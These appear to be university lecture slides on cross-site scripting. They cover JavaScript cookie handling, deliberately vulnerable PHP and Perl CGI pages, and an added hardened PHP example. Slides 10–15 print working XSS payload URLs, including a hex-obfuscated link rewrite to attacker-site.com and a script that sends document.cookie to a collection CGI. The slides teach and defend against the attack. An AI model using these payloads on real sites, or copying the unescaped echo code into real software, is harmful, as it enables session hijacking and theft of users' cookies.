
Cross Site Scripting (XSS) Attack Chien-Chung Shen


1 Cross Site Scripting (XSS) Attack
Chien-Chung Shen, cshen@cis.udel.edu

2 JavaScript (1)
JavaScript is meant specifically for browser-side computing; JavaScript is not allowed to interact with the local file system.
JavaScript started out as a scripting language executed in the browser for browser detection and form verification.
–To ensure that a web page is optimized separately for both Internet Explorer and Firefox, a web server may deliver a page that contains both ways of displaying an HTML object optimally, with the expectation that JavaScript would first figure out which browser was being used and then execute only those commands that are appropriate to that browser.
JavaScript is now widely used for producing mouse-rollover, animation, and other effects in web pages.
JavaScript is an object-based language in the sense that it uses the dot operator to invoke methods on objects.
Objects in JavaScript can be of types object, function, and array; when a variable is assigned an instance of one of these types, the variable is set to a reference to the instance.

3 JavaScript (2)
The most important object of type object in JavaScript is window. An instance of type window stands for the browser window that is currently open.
Every window object contains an instance of type screen, an instance of type navigator, an instance of type location, an instance of type history, an instance of type document, an instance of type self, and an instance of type frames.
The document object is very special because it represents the content of a web page. The document object maintains a DOM (Document Object Model) representation of the contents of a web document as a tree of nodes.
–An HTML document can be easily represented by a tree. The root node for every HTML document is the html element; descending from this root are two child nodes, head and body.

4 JavaScript (3)
The document object, which represents all of the contents of a web page in the form of a DOM (Document Object Model) tree, has a number of very important methods defined for it that allow you to manipulate and animate the different elements in a web page.
For instance, suppose you want to pull into your JavaScript all of the paragraphs in your web page that you defined with the "p" elements. You can do so by invoking
    var allParas = document.getElementsByTagName('p');
where var allParas means that we are defining allParas as a variable. This variable will be set to the array that is returned by the call to the method getElementsByTagName() of the document object.

5 Managing Cookies with JavaScript
Cookies are used to retain some data (state) from one session to another between a browser and a web server.
Enterprise web servers often use cookies stored in browsers to keep track of interaction with their online customers from one visit to the next.
–In this manner, after a new client has been authenticated with, say, a password on the first contact, the cookies can be relied upon for subsequent automatic authentications.
–Cookies can also be used to store customer preferences, to track how customers view a web page, and so on.
–Tools -> Page Info -> Cookies
It may be possible for third parties to steal cookies from an innocent client's browser by mounting a cross-site scripting attack.

6 How JavaScript Sets/Changes Cookies
Example: WealthTracker.html (by Prof. Avi Kak @ Purdue)
Downloading the web page WealthTracker.html from the server constitutes one session.
–Enter a string for your name and an integer for your wealth, and then click on the Submit button. When you click on the Submit button the first time, the browser will show you for verification the information you just entered in the form.
–Now just change the number in the "Wealth" box and see what happens. Do this repeatedly. You will see that this page keeps track of how many times you have visited the page in the past and how your wealth has changed from one visit to the next.
All JavaScript code in the web page is in the form of function definitions. A JavaScript function may be executed automatically upon the occurrence of an event or because it has been called in code that is currently being executed.
All JavaScript appears between <script> and </script> tags.
Between <form> and </form> tags, HTML creates a web form with two text boxes, one for the name and the other for the wealth.

7 How JavaScript Sets/Changes Cookies
Enter your name and the size of your wealth in this form:
    Your Name (Required): <input id="yournamebox" name="yourname" type="text" />
    Size of Your Wealth:
This form is not supposed to send anything back to the server:
–to ensure the form data will NOT be sent back to the server, set the form's action attribute to '#'
–to supply a client-side function to process the form data, make it the value of the onSubmit attribute; when the user clicks on the "Submit" button of the form, whatever the user entered in the form will be processed by the JavaScript method checkEntry() (which returns false to prevent the form from being sent to the server)
–the value of the method attribute does not matter

8 How JavaScript Sets/Changes Cookies
    // Looks up the cookie called `name`. If it exists, report the visit count and the
    // change in wealth and rewrite it; otherwise create it. setCookie(name, value, expiry)
    // is defined elsewhere in WealthTracker.html and is not reproduced on the slide.
    function getSetCookie(name, info) {
        var all_cookies = document.cookie.split(';');
        var cooky = '';
        var nam = '';
        var val = '';
        var found = false;
        for (var i = 0; i < all_cookies.length; i++) {
            cooky = all_cookies[i].split('=');
            nam = cooky[0].replace(/^\s+|\s+$/g, '');     // trim whitespace around the name
            if (nam == name) {
                found = true;
                val = unescape(cooky[1].replace(/^\s+|\s+$/g, ''));
                // value layout: <visits>_visits_<wealth entered on the last visit>
                var val_parts = val.split('_');
                var howManyVisits = Number(val_parts[0]);
                var visit_portion = val_parts[1];
                var prev_info = val_parts[2];
                if (prev_info) {
                    var diff = info - prev_info;
                    var msg = "This is your visit number " + (howManyVisits + 1) + ". " +
                              "Your wealth changed by " + diff;
                    alert(msg);
                }
                var newCookieVal = (howManyVisits + 1) + '_' + visit_portion + '_' + info;
                setCookie(name, newCookieVal, 15);
            }
        }
        if (!found) {                                     // first visit: start the counter
            var cookieValue = "1_visits" + '_' + info;
            setCookie(name, cookieValue, 15);
        }
    }
A cookie consists of "name=value" pairs.

9 XSS Attack (1)
The user visits a specially crafted link (URL) supplied by the attacker. When the user visits the link, the crafted code gets executed by the user's browser.
Query string in a URL: ?name=value&name=value...
–passed on to an application program at the web server
–this is how your search request is conveyed to a search engine like Google
For instance, index.php:
    <?php
    $name = $_GET['name'];                      // taken from the query string, unsanitized
    echo "Welcome $name <br/>";                  // reflected straight into the HTML
    echo "<a href=\"#\">Click to Download</a>";  // link target is not shown on the slide
    ?>
    http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld
    http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld<script>alert('attacked')</script>
When the victim loads the second URL into the browser, the script is echoed into the page and runs: the victim sees an alert box that says 'attacked'.

10 XSS Attack (2)
For instance, index.php:
    <?php
    $name = $_GET['name'];                      // taken from the query string, unsanitized
    echo "Welcome $name <br/>";                  // reflected straight into the HTML
    echo "<a href=\"#\">Click to Download</a>";  // link target is not shown on the slide
    ?>
The attacker can now try to change the target URL of the link "Click to Download":
    http://www.cis.udel.edu/~cshen/index.php?name=HelloWorld<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}</script>
The function is attached to window.onload so that it executes once the page has loaded: because index.php first echoes the given name (and with it the injected script) and only then emits the <a> tag, the link does not yet exist at the moment the script is parsed.

11 XSS Attack (3)
Normally an attacker tends not to craft a URL which a human can directly read, so the attacker encodes the ASCII characters as hex, as follows (the percent-encoded bytes decode to the same window.onload script):
    http://www.cis.udel.edu/~cshen/index.php?name=%48%65%6c%6c%57%6f%72%6c%64%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
Now the victim may not recognize the URL as crafted, because it cannot be read directly, so there is a greater chance that the victim will visit it.

12 Stealing Cookies via XSS Attack (1)
Client-side XSS takes the form of the attacker getting an innocent victim to click on a carefully crafted URL to a web server. Unknown to the victim, this URL carries a query-string portion with embedded JavaScript code that is designed to send the cookies stored in the client's browser for the web server's domain to the attacker's machine.
Convert WealthTracker.html into a CGI script named WealthTracker.cgi, a Perl executable file that spits out the HTML that is sent to the browser requesting this page.
Put WealthTracker.cgi in /usr/lib/cgi-bin:
    http:// /cgi-bin/WealthTracker.cgi
    http:// /cgi-bin/WealthTracker.cgi?name=<script>alert("Hello from a cookie stealer");</script>

13 Stealing Cookies via XSS Attack (2)
    my $forminfo = '';
    $forminfo = $ENV{QUERY_STRING};                      # raw query string from the URL
    $forminfo =~ tr/+/ /;                                # '+' -> space
    $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg;  # %XX -> the byte it encodes
    #$forminfo =~ s/ //g;
    print "$forminfo";                                   # echoed back without encoding
Echo back to the browser the query string if one is found attached to the URL received from the browser:
    http:// /cgi-bin/WealthTracker.cgi?name=<script>alert(document.cookie);</script>
Query string: name=<script>alert(document.cookie);</script>
This query string would be echoed back by the server to the browser, and the browser would ordinarily process the JavaScript in the value of the string:
–Display the cookie(s) in the browser

14 Stealing Cookies via XSS Attack (3)
An evil attacker lures victims with the following URL:
    http:// /cgi-bin/WealthTracker.cgi?name=<script>window.open("http:// /cgi-bin/collect.cgi?cookie="%2Bdocument.cookie)</script>
The attacker has a web server running on the machine www.cis.udel.edu, and its cgi-bin includes a script called collect.cgi that simply collects the information sent to it by the browser on the victim machine because of the JavaScript code in the query-string portion of the URL. The attacker would now be able to harvest the cookies in the victim's browser for the WealthTracker.cgi web site.

15 Stealing Cookies via XSS Attack (4)
    my $forminfo = '';
    $forminfo = $ENV{QUERY_STRING};                      # raw query string from the URL
    $forminfo =~ tr/+/ /;                                # '+' -> space
    $forminfo =~ s/%([a-fA-F0-9]{2,2})/chr(hex($1))/eg;  # %XX -> the byte it encodes
    #$forminfo =~ s/ //g;
    print "$forminfo";                                   # echoed back without encoding
Echo back to the browser the query string if one is found attached to the URL received from the browser.
A clueless client has engaged in a session with this web page. Assume that the same client has received a very authentic-looking email that lures him/her into clicking on a link that points to one of the following URLs:
1. http:// /cgi-bin/WealthTracker.cgi?name=<script>alert(document.cookie);</script>
2. http:// /cgi-bin/WealthTracker.cgi?name=<script>alert("Hello from a cookie stealer");</script>
3. http:// /cgi-bin/WealthTracker.cgi?name=<script>window.open("http://www.cis.udel.edu/cgi-bin/collect.cgi?cookie="%2Bdocument.cookie)</script>
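The index.php of slides 9 and 10 and the WealthTracker.cgi of slides 13 through 15 both print the decoded query-string value straight into the page. Below is an added PHP example, not code from the slides or from the course: the same reflection beside its hardened form (encoding at the point of output, an HttpOnly cookie) and a check that decodes the value the way the Perl does before looking for a script tag. The function names, the cookie name and the sample inputs are assumptions made for this example.

```php
<?php
// Added example, not from the slides: the reflection of the slides' index.php /
// WealthTracker.cgi beside the fix (encode on output, HttpOnly cookie). Function
// names, cookie name and sample inputs are constructed for this example.

// What the slide's code effectively does: the raw value lands inside the HTML.
function render_unsafe(string $name): string {
    return "Welcome $name <br/>";
}

// Hardened output for an HTML text context: '<', '>', '&' and quotes become entities,
// so a value like <script>...</script> is displayed as text instead of executed.
function render_safe(string $name): string {
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "Welcome $safe <br/>";
}

// Log-side check: urldecode() does what the slide's Perl does (tr/+/ / and %XX -> chr),
// so the hex-encoded URL of slide 11 becomes readable. Decode first, then look for a
// script tag; inspecting the raw, still-encoded URL would miss it.
function reflects_script_tag(string $query_value): bool {
    $decoded = urldecode($query_value);
    return preg_match('/<\s*script\b/i', $decoded) === 1;
}

// Constructed inputs of the same shape as the slides' payloads.
$plain   = 'HelloWorld';
$encoded = 'HelloWorld%3c%73%63%72%69%70%74%3ealert(1)%3c%2f%73%63%72%69%70%74%3e';

assert(reflects_script_tag($plain) === false);
assert(reflects_script_tag($encoded) === true);
assert(strpos(render_unsafe(urldecode($encoded)), '<script>') !== false);
assert(strpos(render_safe(urldecode($encoded)), '<script>') === false);

if (PHP_SAPI !== 'cli') {
    // PHP has already percent-decoded $_GET, so do not urldecode() it again.
    $name = $_GET['name'] ?? '';
    // HttpOnly keeps the value out of document.cookie; Secure restricts it to HTTPS.
    // The array form of setcookie() requires PHP 7.3 or later.
    setcookie('WealthTracker', '1_visits_0', [
        'expires'  => time() + 15 * 86400,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    header('Content-Type: text/html; charset=UTF-8');
    echo render_safe($name);
}
```

Run on the command line the assertions exercise the encoder and the decode-then-inspect check; served by a web server the script behaves as a hardened index.php.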

16 CGI in Apache2 (1)
Add the following directive into the file /etc/apache2/sites-enabled/000-default:
    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

17 CGI in Apache2 (2)
To test CGI, put the following hello.cgi inside /usr/lib/cgi-bin/:
    #!/usr/bin/perl
    print "Content-type:text/html\r\n\r\n";
    print '<html>';
    print '<head><title>Hello Word - First CGI Program</title></head>';
    print '<body>';
    print '<h2>Hello Word! This is my first CGI program</h2>';
    print '</body></html>';
Then do:
    sudo chown root:root hello.cgi
    sudo chmod 755 hello.cgi
Open Firefox on your VM and enter localhost/cgi-bin/hello.cgi. It shows "Hello Word! This is my first CGI program".

18 Persistent XSS Attack (1)
The code injected by the attacker is stored in secondary storage (mostly in a database).
Session:
–The HTTP protocol is stateless, which means it does not maintain any state with regard to requests and responses. All requests and responses are independent of each other.
–Once a user has authenticated, the web server should not ask for the username/password again on the user's next request.
–To do this, some kind of state needs to be maintained between the web browser and the web server, which is done through "sessions".
–When the user logs in for the first time, a session ID is created by the web server and sent to the web browser as a "cookie".
–All subsequent requests to the web server are based on the "session id" in the cookie.

19 Persistent XSS Attack (2)
Demonstration:
–There are two types of users: "Admin" and "Normal". When "Admin" logs in, he can see the list of usernames. When "Normal" users log in, they can only update their display name.

